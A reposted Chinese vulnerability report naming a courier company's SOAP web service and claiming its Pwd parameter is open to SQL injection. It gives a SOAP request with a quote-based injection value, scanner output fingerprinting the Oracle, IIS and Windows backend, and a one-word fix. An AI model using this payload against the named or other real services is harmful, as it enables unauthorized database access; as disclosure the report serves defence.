来源:自学PHP网 时间:2015-04-15 14:59 作者: 阅读:次
[导读] 接口地址:http: api zto cn WebService asmx?wsdlPwd参数存在SQL注入漏洞SOAP-ENV:Header SOAP-ENV:Body urn:Search urn:Userid1 urn:Userid...
|
接口地址:
http://api.zto.cn/WebService.asmx?wsdl
Pwd参数存在SQL注入漏洞
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:Search>
<urn:Userid>1</urn:Userid>
<urn:Pwd>-1'</urn:Pwd>
<urn:SrtjobNo>1</urn:SrtjobNo>
</urn:Search>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
版本信息:
[INFO] the back-end DBMS is Oracle web server operating system: Windows 2008 web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5 back-end DBMS: Oracle
oracle库名:
 主库应该在这。。就不继续了。。
修复方案:
过滤~
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
